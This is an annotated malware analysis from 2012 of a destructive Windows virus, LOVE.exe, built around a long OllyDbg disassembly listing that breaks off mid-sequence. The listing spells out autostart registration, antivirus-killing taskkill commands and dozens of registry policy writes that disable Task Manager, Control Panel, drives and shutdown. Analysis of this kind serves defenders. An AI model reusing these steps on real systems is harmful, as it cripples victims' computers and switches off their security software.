LOVE.exe virus: a simple analysis
This post was last edited by Thend on 2012-8-4 13:42.
Basic information
Report title: Analysis of a malicious program   Author: Thend
Report updated: 2012.08.03
Sample discovery date: unknown
Sample type: destructive virus
Sample file MD5: c0d9cec618648730f44f2d5a3bd403db
Packer: none   Language: reported as VC++ 6.0 by the scanner. The call pattern used throughout the listing below (a type tag such as 0x80000004 for text pushed ahead of each argument, the argument count pushed last, the library routine selected in ebx and dispatched through LOVE.00403353) is the support-library calling convention of Easy Language (易语言), which packer scanners routinely misreport as VC++ 6.0, so the sample was most likely built with Easy Language.
Systems at risk: Windows
Summary
Registers itself in a registry Run key for autostart, drops an icon file of its own and sets it as the default icon for every application, and hides or disables most of the system's functions, leaving the computer effectively unusable.
Symptoms on the infected system
Hidden: all files and folders; the Start menu's Run, Shut Down, Log Off and Search entries; disk drives; Folder Options; the IE home-page option group; the IE File menu; the IE Favorites bar; Internet Options.
Disabled: Control Panel, Task Manager, Registry Editor, drive access, printing, IE View Source, IE downloads, the IE context menu, the MS-DOS prompt and "restart in MS-DOS mode", the Documents menu, the right mouse button.
Kills every antivirus process it knows about. Every application icon is replaced. The default open action for .txt and .inf files becomes "view picture".
File-system changes
Writes an image named Aver.ico into C:\windows\system32\ and creates del.bat and ddel.bat in the same directory as the main program; both batch files delete themselves after running (their contents are in the supplement at the end).
Registry changes
These are covered directly in the code analysis; there are far too many to list one by one. The main one, from the Process Monitor log, is:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LOVE.exe SUCCESS "C:\Documents and Settings\Administrator\桌面\LOVE.exe"
i.e. an autostart entry.
Analysis of the malicious program body:
Reading the listing: LOVE.00403353 is the support-library dispatcher; the routine it runs is selected by the address in ebx, the small integer pushed immediately before the call is the argument count, and every argument is pushed as a value preceded by its type tag (0x80000004 for a text string, 0x80000301 for a small integer, 0x80000601 for an 8-byte double, as in the NoDrives write). LOVE.00403365 appears to call one of the program's own subroutines, again selected by ebx. LOVE.0040106F concatenates the ecx strings pushed before it and LOVE.0040335F releases a string buffer. [local.1], [local.2] and [local.3] are OllyDbg's names for the stack variables at ebp-4, ebp-8 and ebp-0C.
CB/.55 push ebp ;breakpoint set at the start of the routine
CC|.8BEC mov ebp,esp
CE|.81EC 14000000 sub esp,0x14
D4|.68 01030080 push 0x80000301
D9|.6A 00 push 0x0
DB|.68 E8030000 push 0x3E8
E0|.68 01000000 push 0x1
E5|.BB 703E4000 mov ebx,LOVE.00403E70
EA|.E8 64220000 call LOVE.00403353
EF|.83C4 10 add esp,0x10
F2|.68 00000000 push 0x0
F7|.BB 10354000 mov ebx,LOVE.00403510 ;j
FC|.E8 52220000 call LOVE.00403353
|.83C4 04 add esp,0x4
|.8945 FC mov [local.1],eax
|.68 00000000 push 0x0
C|.BB 30354000 mov ebx,LOVE.00403530 ;j
|.E8 3D220000 call LOVE.00403353 ;loads the virus's own file name, LOVE.exe
|.83C4 04 add esp,0x4
|.8945 F8 mov [local.2],eax
C|.FF75 F8 push [local.2]
F|.68 D8994600 push LOVE.004699D8 ;\
|.FF75 FC push [local.1]
|.B9 03000000 mov ecx,0x3
C|.E8 3EFFFFFF call LOVE.0040106F ;concatenates the ecx = 3 strings pushed: [local.1] (most likely the running directory) + "\" + LOVE.exe, i.e. the sample's own full path
|> \6A 00 push 0x0
|.6A 00 push 0x0
B|.6A 00 push 0x0
D|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 DA994600 push LOVE.004699DA ;C:\windows\system32\Aver.ico
|.68 01030080 push 0x80000301
E|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
A|.6A 00 push 0x0
C|.8B45 F4 mov eax,[local.3]
F|.85C0 test eax,eax
|.75 05 jnz XLOVE.00401188
|.B8 F7994600 mov eax,LOVE.004699F7
|>50 push eax
|.68 04000000 push 0x4
E|.B8 01000000 mov eax,0x1
|.BB 10754400 mov ebx,LOVE.00447510
|.E8 C8210000 call LOVE.00403365 ;writes the embedded image out as C:\windows\system32\Aver.ico
D|.83C4 34 add esp,0x34
A7|.53 push ebx
A8|.E8 B2210000 call LOVE.0040335F
AD|.83C4 04 add esp,0x4
B0|>68 04000080 push 0x80000004
B5|.6A 00 push 0x0
B7|.68 DA994600 push LOVE.004699DA ;C:\windows\system32\Aver.ico
BC|.68 04000080 push 0x80000004
C1|.6A 00 push 0x0
C3|.68 F8994600 push LOVE.004699F8 ;SOFTWARE\Classes\exefile\DefaultIcon\
C8|.68 01030080 push 0x80000301
CD|.6A 00 push 0x0
CF|.68 04000000 push 0x4
D4|.68 03000000 push 0x3
D9|.BB 103B4000 mov ebx,LOVE.00403B10
DE|.E8 70210000 call LOVE.00403353 ;sets the default icon for every executable (exefile\DefaultIcon) to the Aver.ico just written
F0|.E8 5E210000 call LOVE.00403353 ;loads the sample's own name, LOVE.exe, again
F5|.83C4 04 add esp,0x4
F8|.8945 FC mov [local.1],eax
FB|.FF75 FC push [local.1]
FE|.68 1E9A4600 push LOVE.00469A1E ;Software\Microsoft\Windows\CurrentVersion\Run\
|.B9 02000000 mov ecx,0x2
|.E8 62FEFFFF call LOVE.0040106F ;concatenates Run\ + LOVE.exe: the value name used to register LOVE.exe as an autostart entry
FD|.83C4 04 add esp,0x4
|.8945 FC mov [local.1],eax
|.68 4D9A4600 push LOVE.00469A4D ;\del.bat
|.FF75 FC push [local.1]
B|.B9 02000000 mov ecx,0x2
|.E8 5AFDFFFF call LOVE.0040106F ;builds <dir>\del.bat; the file itself is written to the desktop shortly afterwards
|.83C4 08 add esp,0x8
|.8945 F8 mov [local.2],eax
B|.8B5D FC mov ebx,[local.1]
E|.85DB test ebx,ebx
|.74 09 je XLOVE.0040132B
|.53 push ebx
|.E8 37200000 call LOVE.0040335F
|.68 799A4600 push LOVE.00469A79 ;\ddel.bat
|.FF75 FC push [local.1]
A|.B9 02000000 mov ecx,0x2
F|.E8 DBFCFFFF call LOVE.0040106F
|.83C4 08 add esp,0x8
|.8945 F8 mov [local.2],eax
A|.8B5D FC mov ebx,[local.1]
D|.85DB test ebx,ebx
F|.74 09 je XLOVE.004013AA
A1|.53 push ebx
A2|.E8 B81F0000 call LOVE.0040335F
A7|.83C4 04 add esp,0x4
AA|>68 05000080 push 0x80000005
AF|.6A 00 push 0x0
B1|.68 839A4600 push LOVE.00469A83
B6|.68 04000080 push 0x80000004
BB|.6A 00 push 0x0
BD|.8B45 F8 mov eax,[local.2]
C0|.85C0 test eax,eax
C2|.75 05 jnz XLOVE.004013C9
C4|.B8 F7994600 mov eax,LOVE.004699F7
C9|>50 push eax
CA|.68 02000000 push 0x2
CF|.BB 30374000 mov ebx,LOVE.00403730
D4|.E8 7A1F0000 call LOVE.00403353 ;writes ddel.bat to the desktop
D9|.83C4 1C add esp,0x1C
E4|.E8 761F0000 call LOVE.0040335F
E9|.83C4 04 add esp,0x4
EC|>68 00000000 push 0x0
F1|.B8 01000000 mov eax,0x1
F6|.BB 20764400 mov ebx,LOVE.00447620
FB|.E8 651F0000 call LOVE.00403365 ;the taskbar disappears at this point...
|.83C4 04 add esp,0x4
|.68 00000000 push 0x0
|.B8 01000000 mov eax,0x1
D|.BB C0754400 mov ebx,LOVE.004475C0
|.E8 4E1F0000 call LOVE.00403365
|.83C4 04 add esp,0x4
|.8945 FC mov [local.1],eax
|.68 799A4600 push LOVE.00469A79 ;\ddel.bat
B|.FF75 FC push [local.1]
E|.B9 02000000 mov ecx,0x2
|.E8 17FCFFFF call LOVE.0040106F
|.83C4 08 add esp,0x8
B|.8945 F8 mov [local.2],eax
E|.8B5D FC mov ebx,[local.1]
|.85DB test ebx,ebx
|.74 09 je XLOVE.0040146E
|.53 push ebx
|.E8 F41E0000 call LOVE.0040335F
B|.83C4 04 add esp,0x4
E|>68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
A|.68 02000080 push 0x80000002
F|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.8B45 F8 mov eax,[local.2]
|.85C0 test eax,eax
|.75 05 jnz XLOVE.00401499
|.B8 F7994600 mov eax,LOVE.004699F7
|>50 push eax
A|.68 03000000 push 0x3
F|.BB 80334000 mov ebx,LOVE.00403380
A4|.E8 AA1E0000 call LOVE.00403353 ;runs ddel.bat
D2|.E8 7C1E0000 call LOVE.00403353
D7|.83C4 10 add esp,0x10
DA|.68 01030080 push 0x80000301
DF|.6A 00 push 0x0
E1|.68 01000000 push 0x1
E6|.68 02000080 push 0x80000002
EB|.6A 00 push 0x0
ED|.68 00000000 push 0x0
F2|.68 04000080 push 0x80000004
F7|.6A 00 push 0x0
F9|.68 DA9A4600 push LOVE.00469ADA ;cmd /c taskkill /f /im Aver.exe
FE|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
|.E8 461E0000 call LOVE.00403353 ;runs "cmd /c taskkill /f /im Aver.exe": force-kills any process named Aver.exe (it does not delete Aver.ico)
|.68 4D9A4600 push LOVE.00469A4D ;\del.bat
A|.FF75 FC push [local.1]
D|.B9 02000000 mov ecx,0x2
|.E8 38FBFFFF call LOVE.0040106F
|.83C4 08 add esp,0x8
A|.8945 F8 mov [local.2],eax
D|.8B5D FC mov ebx,[local.1]
|.85DB test ebx,ebx
|.74 09 je XLOVE.0040154D
|.53 push ebx
|.E8 151E0000 call LOVE.0040335F
A|.83C4 04 add esp,0x4
D|>68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
|.68 02000080 push 0x80000002
E|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
A|.6A 00 push 0x0
C|.8B45 F8 mov eax,[local.2]
F|.85C0 test eax,eax
|.75 05 jnz XLOVE.00401578
|.B8 F7994600 mov eax,LOVE.004699F7
|>50 push eax
|.68 03000000 push 0x3
E|.BB 80334000 mov ebx,LOVE.00403380
|.E8 CB1D0000 call LOVE.00403353 ;runs del.bat, which then deletes itself
|.E8 C71D0000 call LOVE.0040335F
|.83C4 04 add esp,0x4
B|>68 04000080 push 0x80000004
A0|.6A 00 push 0x0
A2|.68 FA9A4600 push LOVE.00469AFA ;2056年1月1日 (the date string "1 January 2056")
A7|.68 01000000 push 0x1
AC|.BB B0354000 mov ebx,LOVE.004035B0
B1|.E8 9D1D0000 call LOVE.00403353
B6|.83C4 10 add esp,0x10
B9|.68 03000080 push 0x80000003
BE|.52 push edx
BF|.50 push eax
C0|.68 01000000 push 0x1
C5|.BB C0364000 mov ebx,LOVE.004036C0
CA|.E8 841D0000 call LOVE.00403353 ;sets the system date to 1 January 2056
D2|.68 01030080 push 0x80000301
D7|.6A 00 push 0x0
D9|.68 01000000 push 0x1
DE|.68 02000080 push 0x80000002
E3|.6A 00 push 0x0
E5|.68 00000000 push 0x0
EA|.68 04000080 push 0x80000004
EF|.6A 00 push 0x0
F1|.68 079B4600 push LOVE.00469B07 ;taskkill /f /im kavsvc.exe
F6|.68 03000000 push 0x3
FB|.BB 80334000 mov ebx,LOVE.00403380
|.E8 4E1D0000 call LOVE.00403353 ;finds and force-kills Kaspersky (kavsvc.exe)
|.68 01030080 push 0x80000301
D|.6A 00 push 0x0
F|.68 01000000 push 0x1
|.68 02000080 push 0x80000002
|.6A 00 push 0x0
B|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 229B4600 push LOVE.00469B22 ;taskkill /f /im KVXP.kxp
C|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
|.E8 181D0000 call LOVE.00403353 ;finds and force-kills the Jiangmin antivirus process (KVXP.kxp)
E|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
A|.68 02000080 push 0x80000002
F|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.68 3B9B4600 push LOVE.00469B3B ;taskkill /f /im Rav.exe
|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
C|.E8 E21C0000 call LOVE.00403353 ;kills Rising antivirus (Rav.exe)
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
B|.68 01000000 push 0x1
|.68 02000080 push 0x80000002
|.6A 00 push 0x0
|.68 00000000 push 0x0
C|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 539B4600 push LOVE.00469B53 ;taskkill /f /im Ravmon.exe
|.68 03000000 push 0x3
D|.BB 80334000 mov ebx,LOVE.00403380
A2|.E8 AC1C0000 call LOVE.00403353 ;kills Rising's monitor process (Ravmon.exe)
AA|.68 01030080 push 0x80000301
AF|.6A 00 push 0x0
B1|.68 01000000 push 0x1
B6|.68 02000080 push 0x80000002
BB|.6A 00 push 0x0
BD|.68 00000000 push 0x0
C2|.68 04000080 push 0x80000004
C7|.6A 00 push 0x0
C9|.68 6E9B4600 push LOVE.00469B6E ;taskkill /f /im Mcshield.exe
CE|.68 03000000 push 0x3
D3|.BB 80334000 mov ebx,LOVE.00403380
D8|.E8 761C0000 call LOVE.00403353 ;kills the McAfee VirusScan core process (Mcshield.exe)
E0|.68 01030080 push 0x80000301
E5|.6A 00 push 0x0
E7|.68 01000000 push 0x1
EC|.68 02000080 push 0x80000002
F1|.6A 00 push 0x0
F3|.68 00000000 push 0x0
F8|.68 04000080 push 0x80000004
FD|.6A 00 push 0x0
FF|.68 8B9B4600 push LOVE.00469B8B ;taskkill /f /im VsTskMgr.exe
|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
E|.E8 401C0000 call LOVE.00403353 ;kills a McAfee VirusScan component (VsTskMgr.exe)
|.68 01030080 push 0x80000301
B|.6A 00 push 0x0
D|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 A89B4600 push LOVE.00469BA8 ;SOFTWARE\360Safe\safemon\ExecAccess
E|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 04000000 push 0x4
A|.68 03000000 push 0x3
F|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 0A1C0000 call LOVE.00403353
|.83C4 28 add esp,0x28
C|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
D|.6A 00 push 0x0
F|.68 CC9B4600 push LOVE.00469BCC ;SOFTWARE\360Safe\safemon\MonAccess
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
B|.68 04000000 push 0x4
|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
A|.E8 D41B0000 call LOVE.00403353
F|.83C4 28 add esp,0x28
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 00000000 push 0x0
E|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 EF9B4600 push LOVE.00469BEF ;SOFTWARE\360Safe\safemon\SiteAccess
A|.68 01030080 push 0x80000301
F|.6A 00 push 0x0
A1|.68 04000000 push 0x4
A6|.68 03000000 push 0x3
AB|.BB 103B4000 mov ebx,LOVE.00403B10
B0|.E8 9E1B0000 call LOVE.00403353
B5|.83C4 28 add esp,0x28
B8|.68 01030080 push 0x80000301
BD|.6A 00 push 0x0
BF|.68 00000000 push 0x0
C4|.68 04000080 push 0x80000004
C9|.6A 00 push 0x0
CB|.68 139C4600 push LOVE.00469C13 ;SOFTWARE\360Safe\safemon\UDiskAccess
D0|.68 01030080 push 0x80000301
D5|.6A 00 push 0x0
D7|.68 04000000 push 0x4
DC|.68 03000000 push 0x3
E1|.BB 103B4000 mov ebx,LOVE.00403B10
E6|.E8 681B0000 call LOVE.00403353
EB|.83C4 28 add esp,0x28
EE|.68 01030080 push 0x80000301
F3|.6A 00 push 0x0
F5|.68 01000000 push 0x1
FA|.68 02000080 push 0x80000002
FF|.6A 00 push 0x0
|.68 00000000 push 0x0
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.68 389C4600 push LOVE.00469C38 ;taskkill /f /im 360tray.exe
|.68 03000000 push 0x3
|.BB 80334000 mov ebx,LOVE.00403380
C|.E8 321B0000 call LOVE.00403353 ;kills 360 Safeguard's tray process; together with the four SOFTWARE\360Safe\safemon\*Access values written as 0 above, this shuts 360 down completely
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
B|.68 549C4600 push LOVE.00469C54 ;jpegfile
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 5D9C4600 push LOVE.00469C5D ;.txt\
C|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
|.68 03000000 push 0x3
D|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 FC1A0000 call LOVE.00403353
|.83C4 28 add esp,0x28
A|.68 04000080 push 0x80000004
F|.6A 00 push 0x0
|.68 549C4600 push LOVE.00469C54 ;jpegfile
|.68 04000080 push 0x80000004
B|.6A 00 push 0x0
D|.68 639C4600 push LOVE.00469C63 ;.inf\
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
E|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 C61A0000 call LOVE.00403353 ;sets the default handler for .txt and .inf to jpegfile, so both file types open in the picture viewer
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 00000000 push 0x0
C|.68 04000080 push 0x80000004
A1|.6A 00 push 0x0
A3|.68 699C4600 push LOVE.00469C69 ;SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
A8|.68 01030080 push 0x80000301
AD|.6A 00 push 0x0
AF|.68 04000000 push 0x4
B4|.68 03000000 push 0x3
B9|.BB 103B4000 mov ebx,LOVE.00403B10
BE|.E8 901A0000 call LOVE.00403353 ;writes SHOWALL\CheckedValue = 0, which breaks the "Show hidden files and folders" option so hidden files and folders stay hidden
C6|.68 01030080 push 0x80000301
CB|.6A 00 push 0x0
CD|.68 00000000 push 0x0
D2|.68 04000080 push 0x80000004
D7|.6A 00 push 0x0
D9|.68 C89C4600 push LOVE.00469CC8 ;Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
DE|.68 01030080 push 0x80000301
E3|.6A 00 push 0x0
E5|.68 03000000 push 0x3
EA|.68 03000000 push 0x3
EF|.BB 103B4000 mov ebx,LOVE.00403B10
F4|.E8 5A1A0000 call LOVE.00403353 ;DisableTaskMgr = 1: disables Task Manager
FC|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
|.68 04000080 push 0x80000004
D|.6A 00 push 0x0
F|.68 119D4600 push LOVE.00469D11 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
B|.68 03000000 push 0x3
|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
A|.E8 241A0000 call LOVE.00403353 ;NoControlPanel = 1: disables Control Panel
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 01000000 push 0x1
E|.68 04000080 push 0x80000004
|.6A 00 push 0x0
|.68 5C9D4600 push LOVE.00469D5C ;Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
A|.68 01030080 push 0x80000301
F|.6A 00 push 0x0
|.68 03000000 push 0x3
|.68 03000000 push 0x3
B|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 EE190000 call LOVE.00403353 ;DisableRegistryTools = 1: disables Registry Editor
|.68 01030080 push 0x80000301
D|.6A 00 push 0x0
F|.68 01000000 push 0x1
|.68 04000080 push 0x80000004
|.6A 00 push 0x0
B|.68 AB9D4600 push LOVE.00469DAB ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
|.68 01030080 push 0x80000301
|.6A 00 push 0x0
|.68 03000000 push 0x3
C|.68 03000000 push 0x3
|.BB 103B4000 mov ebx,LOVE.00403B10
|.E8 B8190000 call LOVE.00403353 ;NoRun = 1: removes Run from the Start menu
E|.68 01030080 push 0x80000301
A3|.6A 00 push 0x0
A5|.68 01000000 push 0x1
AA|.68 04000080 push 0x80000004
AF|.6A 00 push 0x0
B1|.68 ED9D4600 push LOVE.00469DED ;SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
B6|.68 01030080 push 0x80000301
BB|.6A 00 push 0x0
BD|.68 03000000 push 0x3
C2|.68 03000000 push 0x3
C7|.BB 103B4000 mov ebx,LOVE.00403B10
CC|.E8 82190000 call LOVE.00403353 ;WinOldApp\Disabled = 1: disables the MS-DOS prompt (command.com); this is not a drive restriction, the drives are handled by NoDrives and NoViewOnDrive below
D4|.68 01060080 push 0x80000601
D9|.68 FFFFEF41 push 0x41EFFFFF
DE|.68 0000E0FF push 0xFFE00000
E3|.68 04000080 push 0x80000004
E8|.6A 00 push 0x0
EA|.68 379E4600 push LOVE.00469E37 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
EF|.68 01030080 push 0x80000301
F4|.6A 00 push 0x0
F6|.68 03000000 push 0x3
FB|.68 03000000 push 0x3
A00|.BB 103B4000 mov ebx,LOVE.00403B10
A05|.E8 49190000 call LOVE.00403353 ;NoDrives: the two dwords under the 0x80000601 tag form the double 0x41EFFFFFFFE00000 = 4294967295.0, i.e. the bitmask 0xFFFFFFFF, so every drive letter is hidden in Explorer
A0D|.68 01060080 push 0x80000601
A12|.68 FFFFEF41 push 0x41EFFFFF
A17|.68 0000E0FF push 0xFFE00000
A1C|.68 04000080 push 0x80000004
A21|.6A 00 push 0x0
A23|.68 7C9E4600 push LOVE.00469E7C ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
A28|.68 01030080 push 0x80000301
A2D|.6A 00 push 0x0
A2F|.68 03000000 push 0x3
A34|.68 03000000 push 0x3
A39|.BB 103B4000 mov ebx,LOVE.00403B10
A3E|.E8 10190000 call LOVE.00403353 ;NoViewOnDrive with the same 0xFFFFFFFF mask: access to every drive is blocked in Explorer
A46|.68 01030080 push 0x80000301
A4B|.6A 00 push 0x0
A4D|.68 01000000 push 0x1
A52|.68 04000080 push 0x80000004
A57|.6A 00 push 0x0
A59|.68 C69E4600 push LOVE.00469EC6 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
A5E|.68 01030080 push 0x80000301
A63|.6A 00 push 0x0
A65|.68 03000000 push 0x3
A6A|.68 03000000 push 0x3
A6F|.BB 103B4000 mov ebx,LOVE.00403B10
A74|.E8 DA180000 call LOVE.00403353 ;NoFolderOptions = 1: removes Folder Options
A7C|.68 01030080 push 0x80000301
A81|.6A 00 push 0x0
A83|.68 01000000 push 0x1
A88|.68 04000080 push 0x80000004
A8D|.6A 00 push 0x0
A8F|.68 129F4600 push LOVE.00469F12 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
A94|.68 01030080 push 0x80000301
A99|.6A 00 push 0x0
A9B|.68 03000000 push 0x3
AA0|.68 03000000 push 0x3
AA5|.BB 103B4000 mov ebx,LOVE.00403B10
AAA|.E8 A4180000 call LOVE.00403353 ;NoClose = 1: removes Shut Down from the Start menu
AB2|.68 01030080 push 0x80000301
AB7|.6A 00 push 0x0
AB9|.68 01000000 push 0x1
ABE|.68 04000080 push 0x80000004
AC3|.6A 00 push 0x0
AC5|.68 569F4600 push LOVE.00469F56 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
ACA|.68 01030080 push 0x80000301
ACF|.6A 00 push 0x0
AD1|.68 03000000 push 0x3
AD6|.68 03000000 push 0x3
ADB|.BB 103B4000 mov ebx,LOVE.00403B10
AE0|.E8 6E180000 call LOVE.00403353 ;NoFind = 1: removes Search from the Start menu
AE8|.68 01030080 push 0x80000301
AED|.6A 00 push 0x0
AEF|.68 01000000 push 0x1
AF4|.68 04000080 push 0x80000004
AF9|.6A 00 push 0x0
AFB|.68 999F4600 push LOVE.00469F99 ;Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage
B00|.68 01030080 push 0x80000301
B05|.6A 00 push 0x0
B07|.68 03000000 push 0x3
B0C|.68 03000000 push 0x3
B11|.BB 103B4000 mov ebx,LOVE.00403B10
B16|.E8 38180000 call LOVE.00403353 ;HomePage = 1: locks the IE home-page option group
B1E|.68 01030080 push 0x80000301
B23|.6A 00 push 0x0
B25|.68 01000000 push 0x1
B2A|.68 04000080 push 0x80000004
B2F|.6A 00 push 0x0
B31|.68 DE9F4600 push LOVE.00469FDE ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
B36|.68 01030080 push 0x80000301
B3B|.6A 00 push 0x0
B3D|.68 03000000 push 0x3
B42|.68 03000000 push 0x3
B47|.BB 103B4000 mov ebx,LOVE.00403B10
B4C|.E8 02180000 call LOVE.00403353 ;NoFileMenu = 1: hides the File menu in Explorer and IE windows
B54|.68 01030080 push 0x80000301
B59|.6A 00 push 0x0
B5B|.68 01000000 push 0x1
B60|.68 04000080 push 0x80000004
B65|.6A 00 push 0x0
B67|.68 25A04600 push LOVE.0046A025 ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites
B6C|.68 01030080 push 0x80000301
B71|.6A 00 push 0x0
B73|.68 03000000 push 0x3
B78|.68 03000000 push 0x3
B7D|.BB 103B4000 mov ebx,LOVE.00403B10
B82|.E8 CC170000 call LOVE.00403353 ;NoFavorites = 1: hides the IE Favorites menu
B8A|.68 01030080 push 0x80000301
B8F|.6A 00 push 0x0
B91|.68 01000000 push 0x1
B96|.68 04000080 push 0x80000004
B9B|.6A 00 push 0x0
B9D|.68 6CA04600 push LOVE.0046A06C ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting
BA2|.68 01030080 push 0x80000301
BA7|.6A 00 push 0x0
BA9|.68 03000000 push 0x3
BAE|.68 03000000 push 0x3
BB3|.BB 103B4000 mov ebx,LOVE.00403B10
BB8|.E8 96170000 call LOVE.00403353 ;NoPrinting = 1: disables printing from IE
BC0|.68 01030080 push 0x80000301
BC5|.6A 00 push 0x0
BC7|.68 01000000 push 0x1
BCC|.68 04000080 push 0x80000004
BD1|.6A 00 push 0x0
BD3|.68 B2A04600 push LOVE.0046A0B2 ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions
BD8|.68 01030080 push 0x80000301
BDD|.6A 00 push 0x0
BDF|.68 03000000 push 0x3
BE4|.68 03000000 push 0x3
BE9|.BB 103B4000 mov ebx,LOVE.00403B10
BEE|.E8 60170000 call LOVE.00403353 ;NoBrowserOptions = 1: hides Internet Options
BF6|.68 01030080 push 0x80000301
BFB|.6A 00 push 0x0
BFD|.68 01000000 push 0x1
C02|.68 04000080 push 0x80000004
C07|.6A 00 push 0x0
C09|.68 FEA04600 push LOVE.0046A0FE ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource
C0E|.68 01030080 push 0x80000301
C13|.6A 00 push 0x0
C15|.68 03000000 push 0x3
C1A|.68 03000000 push 0x3
C1F|.BB 103B4000 mov ebx,LOVE.00403B10
C24|.E8 2A170000 call LOVE.00403353 ;NoViewSource = 1: disables View Source in IE
C2C|.68 01030080 push 0x80000301
C31|.6A 00 push 0x0
C33|.68 03000000 push 0x3
C38|.68 04000080 push 0x80000004
C3D|.6A 00 push 0x0
C3F|.68 46A14600 push LOVE.0046A146 ;Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
C44|.68 01030080 push 0x80000301
C49|.6A 00 push 0x0
C4B|.68 03000000 push 0x3
C50|.68 03000000 push 0x3
C55|.BB 103B4000 mov ebx,LOVE.00403B10
C5A|.E8 F4160000 call LOVE.00403353 ;Zones\3\1803 = 3: disables file downloads in the Internet zone. Note the key name in the binary's string reads "Interner Settings"; if that is really how the sample spells it, the write lands in a nonexistent key and downloads are not actually disabled
C62|.68 01030080 push 0x80000301
C67|.6A 00 push 0x0
C69|.68 01000000 push 0x1
C6E|.68 04000080 push 0x80000004
C73|.6A 00 push 0x0
C75|.68 8FA14600 push LOVE.0046A18F ;Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu
C7A|.68 01030080 push 0x80000301
C7F|.6A 00 push 0x0
C81|.68 03000000 push 0x3
C86|.68 03000000 push 0x3
C8B|.BB 103B4000 mov ebx,LOVE.00403B10
C90|.E8 BE160000 call LOVE.00403353 ;NoBrowserContextMenu = 1: disables IE's right-click context menu
C98|.68 01030080 push 0x80000301
C9D|.6A 00 push 0x0
C9F|.68 01000000 push 0x1
CA4|.68 04000080 push 0x80000004
CA9|.6A 00 push 0x0
CAB|.68 DFA14600 push LOVE.0046A1DF ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
CB0|.68 01030080 push 0x80000301
CB5|.6A 00 push 0x0
CB7|.68 03000000 push 0x3
CBC|.68 03000000 push 0x3
CC1|.BB 103B4000 mov ebx,LOVE.00403B10
CC6|.E8 88160000 call LOVE.00403353 ;NoRealMode = 1: disables "Restart in MS-DOS mode"
CCE|.68 01030080 push 0x80000301
CD3|.6A 00 push 0x0
CD5|.68 01000000 push 0x1
CDA|.68 04000080 push 0x80000004
CDF|.6A 00 push 0x0
CE1|.68 26A24600 push LOVE.0046A226 ;Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
CE6|.68 01030080 push 0x80000301
CEB|.6A 00 push 0x0
CED|.68 03000000 push 0x3
CF2|.68 03000000 push 0x3
CF7|.BB 103B4000 mov ebx,LOVE.00403B10
CFC|.E8 52160000 call LOVE.00403353 ;NoLogOff = 1: removes Log Off from the Start menu
D04|.68 01030080 push 0x80000301
D09|.6A 00 push 0x0
D0B|.68 01000000 push 0x1
D10|.68 04000080 push 0x80000004
D15|.6A 00 push 0x0
